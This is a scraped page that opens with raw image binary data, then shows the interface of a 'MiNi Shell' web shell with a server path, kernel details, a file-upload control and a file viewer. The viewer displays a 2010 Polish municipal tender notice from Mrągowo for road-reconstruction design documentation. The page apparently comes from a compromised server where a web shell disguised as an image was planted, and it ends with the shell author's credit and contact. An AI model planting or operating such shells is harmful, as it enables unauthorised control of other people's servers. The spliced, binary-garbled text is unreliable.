JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100210/27977-N-2010.html

<p class="kh_header"><b>Mrągowo: Wykonanie dokumentacji projektowo - kosztorysowej na: Przebudowę ulic: Oficerskiej, Roosevelta, Traugutta, Chopina, Rybnej, Jeziornej, Wyzwolenia w Mrągowie wraz z infrastrukturą techniczną</b><br>
<b>Numer ogłoszenia: 27977 - 2010; data zamieszczenia: 10.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Mrągowo , ul. Królewiecka 60A, 11-700 Mrągowo, woj. warmińsko-mazurskie, tel. 089 7413256, faks 089 7412874.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mragowo.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo - kosztorysowej na: Przebudowę ulic: Oficerskiej, Roosevelta, Traugutta, Chopina, Rybnej, Jeziornej, Wyzwolenia w Mrągowie wraz z infrastrukturą techniczną.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie powinno zawierać:
1. Projekt budowlano - wykonawczy Przebudowa ulicy Oficerskiej, Roosevelta, Traugutta, Chopina, Rybnej, Jeziornej, Wyzwolenia w Mrągowie wraz z infrastrukturą techniczną wykonany zgodnie z przepisami ustawy z dnia 17 lipca 1994 r. - Prawo budowlane i Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z dnia 16 września 2004 r. Nr 202, poz. 2072 z póź. zmianami), oraz zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z dnia 14 maja 1999r.) wraz z projektami branżowymi oraz projektem zagospodarowania terenu -  6 egz. 
2. Specyfikacja techniczna wykonania i odbioru robót budowlanych wykonana zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z dnia 16 września 2004 r. Nr 202, poz. 2072 z póź. zmianami),  - 1 egz.
3. Kosztorys inwestorski wykonany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego (Dz. U. Nr 130, poz. 1389), w układzie specyfikacyjnym i podzielonym na etapy- 1 egz. 
4. Przedmiar robót w układzie specyfikacyjnym i podzielony na etapy - 1 egz.
5. Projekt stałej organizacji ruchu w oparciu o ustawę z dnia 1 lutego 1983 r. Prawo o ruchu drogowym (Dz.U. z 1983 r., Nr 6, poz. 35 z późn. zm.) oraz Rozporządzenie Ministra Infrastruktury z 03 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003 r., Nr 220, poz. 2181) i Rozporządzenie Ministra Infrastruktury z dnia 23 września 2003 r. w sprawie szczegółowych warunków zarządzania ruchem na drogach oraz wykonywania nadzoru nad tym zarządzaniem (Dz. U. z 2003 r., Nr 177, poz. 1729). - 6 egz. 
6. Badania geotechniczne podłoża gruntowego zgodnie z Instrukcją Badań Podłoża Gruntowego Budowli Drogowych i Mostowych wydaną przez GDDP w Warszawie w 1998 r. i Katalogiem wzmocnień i remontów nawierzchni podatnych i półsztywnych GDDKiA, Warszawa 2001 - 3egz.
7. Całość opracowania w formie elektronicznej (część tekstowa opracowania w formacie *.doc [MS Word] lub *.pdf [Adobe Reader], część rysunkowa w formacie *.dwg lub *.dxf  oraz w *.pdf [Adobe Reader]; kosztorys i przedmiar robót w formacie *.ath [Norma] lub  *.xls [MS Excel]
Wymagania dotyczące projektu:
1. Do obowiązków Wykonawcy w ramach realizacji zadania należeć będzie:
a)	Wykonanie mapy do celów projektowych. 
Wykonawca pozyska we własnym zakresie mapy do celów projektowych. Mapa do celów projektowych, sytuacyjno-wysokościowa w skali 1:500, powinna posiadać aktualną klauzulę właściwego ośrodka geodezyjnego oraz powinna spełniać wymagania określone w ustawie. Zakres mapy powinien obejmować lokalizację zgodnie z mapą poglądową stanowiąca załącznik do programu projektowego. Zamawiający ma otrzymać mapę numeryczną w formacie danych *.dwg na nośniku CD- R oraz w wersji papierowej. Mapy muszą obejmować inwentaryzację podziemną i nadziemną oraz inwentaryzację drzew;
b)	Uzyskanie wszelkich niezbędnych opinii, uzgodnień, oświadczeń oraz decyzji niezbędnych do uzyskania pozwolenia na budowę (m. in. zgody właścicieli gruntów na wejście i prowadzenie robót, uzgodnienia z gestorami mediów).
c)	Uzyskanie decyzji o środowiskowych uwarunkowaniach inwestycji;
d)	Raport o oddziaływaniu planowanego przedsięwzięcia na środowisko wymagany do uzyskania decyzji o środowiskowych uwarunkowaniach jeżeli w przedmiotowym postępowaniu okaże się konieczny;
e)	Opracowanie operatu wodnoprawnego,
f)	Plan BIOZ;
g)	Opracowanie pełnobranżowego projektu budowlanego oraz projektów wykonawczych zgodnie z obowiązującymi przepisami technicznymi oraz wytycznymi co do ich zawartości. Opracowanie musi zawierać elementy projektu wykonawczego ze stopniem szczegółowości umożliwiającym Wykonawcom prawidłowo ustalić cenę za wykonanie robót oraz prawidłowo zrealizować roboty budowlane. Projekt musi zawierać szczegóły konstrukcyjne, określać parametry i typy wybranych materiałów urządzeń z podaniem gabarytów urządzeń. Należy przewidzieć luki montażowe dla urządzeń wymagających specjalnych otworów montażowych. Projekt musi być skoordynowany we wszystkich branżach, w przypadku elementów instalacyjnych i technologicznych musi zawierać szczegóły tych rozwiązań. Projekt konstrukcyjny musi zostać wykonany w zakresie pełnym, tj. posiadać wszelkie niezbędne obliczenia oraz zestawienia tabelaryczne. Szczegółowy zakres i forma projektu budowlanego powinna spełniać wymagania określone w ustawie Prawo budowlane w tym w art.34 ust.1, 2 i 3 oraz w rozporządzeniu i w warunkach technicznych. Projekt budowlany powinien zawierać:
a. Projekt Zagospodarowania Terenu obejmujący
- Opis techniczny wszystkich branż,
- Plan sytuacyjny - projekt zagospodarowania terenu,
b. Projekt ciągów komunikacyjnych,
c. Projekt budowy kanalizacji deszczowej
d. Projekt przebudowy oświetlenia ulicznego
e. Projekt przebudowy linii energetycznej
f. Projekt przebudowy sieci teletechnicznej		 
Projekt Wykonawczy winien ponadto zawierać wszelkie szczegóły rozwiązań konstrukcyjnych i technologicznych, zestawienia materiałów, rysunki detali, szczegóły połączeń w węzłach itp.
Dokumentacja powinna być zaprojektowana z poszanowaniem wartości krajobrazu i istniejącej szaty roślinnej. Koszt usunięcia (karczowania i plantowania) i ewentualnych nasadzeń należy uwzględnić w kosztach przedsięwzięcia.
h)	Opracowanie Kosztorysów Inwestorskich oraz Przedmiarów Robót w układzie branżowym + Zbiorcze zestawienie kosztów (ZZK);
i)	Opracowanie Specyfikacji Technicznych Wykonania i Odbioru Robót. 
Wykonawca opracuje Specyfikację Techniczną (ST) dla planowanej inwestycji. Poszczególne pozycje ST będą miały swoje bezpośrednie odzwierciedlenie w kosztorysie inwestorskim. ST będzie zawierała zakres prac do wykonania, metodę ich wykonania, wymagania dotyczące jakości materiałów, parametry materiałów, urządzeń i maszyn, wymagania dotyczące jakości robót, sposób prowadzenia obmiaru i odbioru robót oraz  podstawę płatności za poszczególne roboty. ST odnosić się muszą do wszystkich robót ujętych w projekcie. Szczegółowość opisów musi zapewnić możliwość prawidłowej wyceny robót i ich realizacje przez Wykonawcę. 
Wytyczne do projektowania:
- ciągi jezdne - nawierzchnia (ul. Chopina od ul. Warszawskiej do ul. Roosevelta, ul. Roosevelta, 
ul. Traugutta od ul. Warszawskiej do ul. Roosevelta, ul. Wyzwolenia  - kostka granitowa, pozostałe ulice - kostka betonowa polbruk gr. 8 cm typu starobruku)
- ciągi piesze - nawierzchnia kostka betonowa polbruk gr. 8cm ;
- odprowadzenie wód deszczowych zgodnie z  warunkami ZWiK Sp. z o.o. w Mrągowie; (warunki na odprowadzenie wód deszczowych z ul. Oficerska, Traugutta, części ul. Warszawskiej i części ul. Roosevelta w załączeniu);
- Projektując kanalizację deszczową należy uwzględnić zlewnię z ulicy Warszawskiej oraz tak zaprojektować studnie rewizyjne na skrzyżowaniach z ulicami Wyzwolenia i Traugutta, aby była możliwość dalszej rozbudowy sieci w ulicy Warszawskiej.
- projekt należy podzielić na cztery etapy wyraziście rozdzielone zarówno w dokumentacji technicznej jak i kosztorysowej w sposób następujący:
	1/ Etap I - Przebudowa ulicy Oficerskiej
	2/ Etap II _ przebudowa ulic: Wyzwolenia, Traugutta i Roosevelta do ul. Wyzwolenia
	3/ Etap III - Przebudowa ulic: Roosvelta od ul. Wyzwolenia, Chopina, Jeziorna, Rybna
- poszczególne branże również należy rozdzielić zgodnie z etapami;
- wyodrębnić linie oświetleniową ze wspólnych sieci z nn;
- Linie napowietrzne przebudować na kablowe;
- Na ul. Oficerskiej zastosować słupy aluminiowe, oprawy z materiałów biodegradalnych, (nadających się do ponownego przerobu); 
- na ulicy Wyzwolenia, Roosevelta, Traugutta, Chopina, Jeziornej i Rybnej zastosować lampy 
ozdobne - zgodnie z istniejącymi.
- przy ul. Jeziornej 1A przebudować oświetlenie elewacyjne na słupowe;
- doprojektować oświetlenie na nieoświetlonym odcinku ul. Roosvelta do ul. Ratuszowej;
Zagospodarowanie pasa drogowego, technologię wykonania i zastosowanie materiałów należy uzgodnić ostatecznie na etapie opracowywania dokumentacji z Zamawiającym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości udzielenia zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.93.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) wymienionych niżej dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) wymienionych niżej dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) wymienionych niżej dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) wymienionych niżej dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) wymienionych niżej dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">dwie referencje</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następującym zakresie:
a) Termin realizacji zamówienia może ulec zmianie w następujących sytuacjach:
- w przypadku opóźnienia zamawiającego w przekazaniu wykonawcy niezbędnych materiałów i danych do projektowania,
- zmian dokumentacji projektowej lub rozszerzenia zakresu prac przez zamawiającego.
b) Wynagrodzenie wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:
- zmiana stawki urzędowej podatku VAT,
- wykonanie prac zamiennych - o wartość tych prac,
- rezygnacji z części prac, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy - o wartość niewykonanych prac.
c) Inne zmiany:
1/ w zakresie kluczowego personelu wykonawcy lub zamawiającego, za uprzednią zgodą zamawiającego wyrażoną na piśmie, akceptującą kandydata na kluczowe stanowisko kierownicze,
2/ w zakresie podwykonawstwa za uprzednią zgodą zamawiającego:
- powierzenie podwykonawcom innej części prac niż wskazana w ofercie wykonawcy,
- zmiana podwykonawcy na etapie realizacji prac projektowych, o ile nie sprzeciwia się to postanowieniom SIWZ,
3/ w przypadku aktualizacji rozwiązań z uwagi na postęp techniczny lub zmiany obowiązujących przepisów techniczno-budowlanych.
2. Zmiana postanowień zawartych w umowie może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności, przy zachowaniu art. 144 ustawy Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mragowo.um.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mragowie, ul. Królewiecka 60A, 11-700 Mragowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2010 godzina 10:30, miejsce: Urząd Miejski w Mragowie, ul. Królewiecka 60A, 11-700 Mragowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com